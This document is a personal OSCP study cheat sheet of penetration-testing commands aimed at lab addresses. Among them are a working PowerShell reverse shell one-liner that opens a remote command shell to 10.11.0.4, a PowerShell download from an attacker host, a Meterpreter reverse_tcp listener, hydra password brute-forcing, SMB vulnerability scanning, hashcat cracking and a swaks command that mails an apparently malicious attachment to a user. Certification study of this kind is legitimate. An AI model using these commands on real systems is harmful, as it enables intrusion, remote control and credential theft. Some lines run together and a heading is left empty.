OSCP Survival Notes
This is a list with a lot of useful commands/notes for the OSCP.
I will be updating the list continuously as I am progressing with the
Pen-200 course content or while I am hacking machines on HTB or THM.
Notes regarding Active Directory, Tunneling, and Port Forwarding are coming soon
Useful Linux Commands & Tricks:
Assigning ip to an environment variable:
An environment variable can be defined with the export command. For example, if we are scanning a target and don’t want to type in the system’s IP address repeatedly, we can quickly assign it an environment variable and use that instead:
kali@kali:~$ export b=10.11.1.220
kali@kali:~$ ping -c 2 $b
PING 10.11.1.220 (10.11.1.220) 56(84) bytes of data.
64 bytes from 10.11.1.220: icmp_seq=1 ttl=62 time=2.23 ms
64 bytes from 10.11.1.220: icmp_seq=2 ttl=62 time=1.56 msReuse a command from shell history without re-typing the whole command:
kali@kali:~$ history
1 cat /etc/lsb-release
2 clear
3 historyRather than re-typing a long command from our history, we can make use of the history expansion facility. For example, looking back at Listing 7, there are three commands in our history with a line number preceding each one. To re-run the first command, we simply type the ! character followed by the line number, in this case 1, to execute the cat /etc/lsb-release command:
kali@kali:~$ !1
cat /etc/lsb-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"Powershell:
Downloading files with Powershell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
wget.exe -VReverseshell with Powershell:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Service enumeration:
Scanning for the NetBIOS & SMB Services:
With Nmap
nmap -v -p 139,445 -oG smb.txt <ip>With nbtscan
nbtscan is one of the specialized tools for identifying NetBIOS information, the -r option is used to specify the originating UDP port as 137, which is used to query the NetBIOS name service for valid NetBIOS names:
sudo nbtscan -r 10.11.1.0/24Sql injection:
SQLlite3:
Making a share point between Linux and Windows over Xfreerdp
xfreerdp /v:Target_Windows_IP /u:offsec /p:lab /drive:<path_You_Want_To_Share_On_Linux>,<Path_to_The_File_On_Win>
xfreerdp /v:192.168.240.196 /u:offsec /p:lab /drive:/home/kali/Desktop,C:\Users\offsec\Desktop\ticket.docSending email with Swaks:
swaks --server <server_IP> --port <Port_Number> --auth-user <your_user_on_the_server> --from <your_user_emai> --to <Reciever_email> --attach @<The_attachment>
swaks --server 192.168.191.199 --port 587 --auth-user test@supermagicorg.com --from test@supermagicorg.com --to dave.wizard@supermagicorg.com --attach @config.library-msScanning for SMB vulnerabilities with Nmap if port 445 is open:
nmap --script smb-vuln* -p <Target_IP>Setting up a Meterpreter listener:
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <LHOST_IP>;set LPORT 4444;run;"HTTP Basic Auth attack with hydra
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.225.201 http-get "/"
Good reference
http://tylerrockwell.github.io/defeating-basic-auth-with-hydra/Cracking Md5 hash with hashcat using rules
hashcat -m 0 <file_containing_hash> <path_To_wordlist> -r <demo_file> --force
hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
